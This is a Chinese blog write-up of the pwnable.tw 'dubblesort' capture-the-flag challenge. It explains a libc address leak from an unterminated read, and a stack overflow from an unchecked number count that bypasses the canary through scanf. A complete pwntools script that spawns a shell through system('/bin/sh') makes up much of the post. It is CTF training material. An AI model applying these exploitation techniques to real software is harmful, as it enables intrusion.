【pwnable.tw】dubblesort

已于 2023-09-23 10:54:09 修改
阅读量51 收藏
点赞数
分类专栏: # pwnable 文章标签: 安全
于 2023-09-22 15:01:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133171142
版权

32位程序,保护全开,这题本地通了,远程偏移有问题,一直打不通。

本地主要有两个漏洞,一个是read后没有置0,存在内存泄漏。另一个是对要排序的数据个数没有检查,存在数组越界。

这里可以利用内存泄漏去泄漏libc基地址,然后再利用数组越界写往返回地址处写入system函数地址。

但是需要注意是,这题没办法泄漏canary,因为canary的最后一个字节为\x00,所以printf刚好无法输出。但是我们可以利用scanf输入错误字符跳过输入。

最坑的可能就是canary的位置了 

  unsigned int v11; // [esp+7Ch] [ebp-10h]

  v11 = __readgsdword(0x14u);

经过调试canary没有在ebp-0x10处,但是确实是在esp+0x7c处

 需要注意的是,最后进行会按照升序排序,所以需要注意输入的数字大小关系。不过binsh的地址是大于system的地址的,所以不用担心啦

from pwn import *

context(arch = "i386", os = "linux", endian = "little")
context.terminal = ["tmux", "splitw", "-h"]

io = process("./dubblesort")
#io = remote("node4.buuoj.cn", 27775)
elf = ELF("dubblesort")
libc = elf.libc
#gdb.attach(io, 'b *$rebase(0x000009c3)')

io.sendafter(b"name :", b'A'*9)
io.recvuntil(b"Hello ")
io.recvuntil(b"A"*8)
libc.address = u32(io.recv(4)) - 0x1eb041
print(hex(libc.address))

system = libc.sym.system
binsh = next(libc.search(b"/bin/sh\x00"))

print("system:", hex(system))
print("binsh:", hex(binsh))

io.sendlineafter(b"sort :", b"35")
for i in range(24):
        io.sendlineafter(b"number : ", str(i).encode())

io.sendlineafter(b"number : ", b"+")

for i in range(25, 34):
        io.sendlineafter(b"number : ", str(system).encode())

io.sendlineafter(b"number : ", str(binsh).encode())

#pause()
io.interactive()

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rate.bot.com.tw:台湾银行黄金价格抓取程式
06-11
台湾银行黄金价格抓取程式 序 此程式以语言撰写,以日期为参数抓取台湾银行。最后将结果写入records.csv,栏位格式如下: Unix timestamp,銀行買入價格,銀行賣出價格 因为银行周末休息,所以不更新纪录。 API GET http://rate.bot.com.tw/Pages/UIP005/UIP00511.aspx?whom=GB0030001000&afterOrNot=0&curcd=TWD&date=20000101 只需变换date参数。
攻防世界PWNdubblesort题解
seaaseesa的博客
11-18 1089
dubblesort 首先看一下程序的保护机制 保护全开,并且是一个32位程序 然后,我们用IDA分析一下 这里,有两个漏洞 第一个是在调用read之前,没有调用memset对buf清空,因此,buf里可能之前会有一些残留的关键数据 第二个是,输入的整数个数没有上限,可以造成数据溢出,其实也就是栈溢出。 我们在read断点,然后观察栈中的数据,发现数据还未输入时,栈里就...
pwnable.tw dubblesort
weixin_30896511的博客
03-15 187
(留坑,远程没打成功) int __cdecl main(int argc, const char **argv, const char **envp) { int t_num_count; // eax int *num_stack; // edi unsigned int input_count; // esi unsigned int output_ptr; ...
pwnable.tw dubblesort 经验总结
qq_43189757的博客
10-29 799
漏洞点: read函数读取的时候不会在数据末尾加上’\x00’ , 这就导致了可以泄露栈上的libc地址 v9 没有进行边界检查, 导致输入的数据可以导致栈溢出 写exp时碰到的问题: 1.IDA 生成的伪代码变量的表示位置出现问题 canary的值 显示是存放在esp + 0x7c 或 ebp - 0x10 上, 这两种应该都是指的同一地址, 但是实际调试的时候发现结果不一样 一开始是按...
pwnable.tw dubblesort 分析
weixin_30301183的博客
03-17 109
本系列为用于记录那些比较有意思的题目。 题目为一个排序算法,就如题目名称那样,dubblesort,32位程序。 利用思路为栈溢出,先是栈溢出泄露出栈上libc的相关数据从而获取libc地址,再是栈溢出覆盖ebp下一处劫持控制流。第二步时需要注意存在着一个canery需要绕过,可以使用scanf的%d输入为+时为没有输入的方式跳过(返回值会出错但本题没检查),就一个数字的长度,在第25个。 转...
pwnable.tw】orw
qq_61670993的博客
09-22 68
32位orw,很简单没啥好说的。
pwnable.tw【start】
weixin_51055545的博客
04-22 335
检查程序 任何保护都没开, 放到IDA中分析: 逆向分析 很简单的一个程序,只有start和exit两个函数,通过分析汇编,我们知道,程序先write出欢迎的语句,然后系统调用read(),来让我们输入,我们输入的栈上是可读可写可执行的,所以我们leak出stack地址,然后控制程序返回到我们构造好的shellcode即可, 思路 1.通过构造write()来leak出栈地址 2.通过控制返回地址,来执行我们的shellcode,从而达到getshell的目的. exp分析: io.recvuntil(
pwnable.tw---start
杀生丸?不,其实我要的是桔梗
04-30 1490
Pwnable.tw—start 最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。 题目分析: checksec : 第一次遇到什么防护都不开的程序,兴奋。 IDA: 题目只有start和exit。 检测栈有点问题,不能够F5,强行看汇编。。。 .text:08048060 public _start ....
pwnable.tw - orw
不急不躁
07-09 3002
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
Assassins.Creed.III.TW.THETA.RIP.torrent
07-20
Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME....
ha2.tw
03-28
ha2.tw 项目设置 npm install 编译和热重装以进行开发 npm run serve 编译并最小化生产 npm run build 整理和修复文件 npm run lint 自定义配置 请参阅。
hackathon.tw-website
06-03
鲍尔 $ npm install -g bower$ bower i吞咽 $ npm install -g gulp$ npm install -g less$ npm i用法 $ gulp less
docs.roy4801.tw
02-12
docs.roy4801.tw
pwnable.tw - start
不急不躁
07-08 4122
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
保序加密技术:保护数据有序性的安全方案
jiamisoft的博客
04-30 623
保序加密技术是一种特殊的加密方式,它允许对加密数据进行特定的有序操作,同时保持数据的加密状态。与传统的加密技术不同,OPE允许用户在不解密的情况下,对加密的数据进行范围搜索和比较,因为加密后的数据保持了原始数据的顺序特性。
合规基线:让安全大检查更顺利
a38417的博客
04-29 1138
德迅基线产品还支持自定义基线功能,企业可根据实际的使用场景,自行定义基线的检查项,如定义检查阈值、自定义检查目录、自定义检查结果展现模板、自定义检查项整改方案等,以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前,迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具,并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。,进行实时安全核查,快速发现安全配置变化,一旦发生安全配置变更异常,以邮件方式进行安全告警。相对于其他同等产品优势,
四川古力未来科技抖音小店安全:守护您的网购体验
lnqdds的博客
04-30 390
四川古力未来科技抖音小店以其严格的管理制度、先进的技术支持和完善的售后服务,为消费者提供了一个安全、可靠的购物环境。在互联网购物日益普及的今天,四川古力未来科技抖音小店以其独特的魅力和安全保障措施,成为越来越多消费者信赖的购物平台。平台致力于为消费者提供一个安全、可靠、便捷的购物环境,通过多重安全验证、数据加密等措施,确保消费者的购物信息和资金安全。同时,平台定期对商家进行监管和评估,对于存在违规行为的商家,将及时进行处理,确保消费者的购物权益不受损害。五、用户评价与信誉体系。六、加强用户教育与宣传。
安全运维 -- splunk 操作手册
最新发布
leeezp的博客
04-30 973
日常运维操作笔记 (持续更新)
net.ipv4.tcp_tw_recycle
03-16
net.ipv4.tcp_tw_recycle是 Linux 下用于重用 TIME_WAIT 状态的套接字,可以设置为 0 或 1,其中 0 表示禁用,1 表示启用。net.ipv4.tcp_tw_recycle是一个Linux内核参数,用于控制TCP连接的回收行为。如果该参数被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值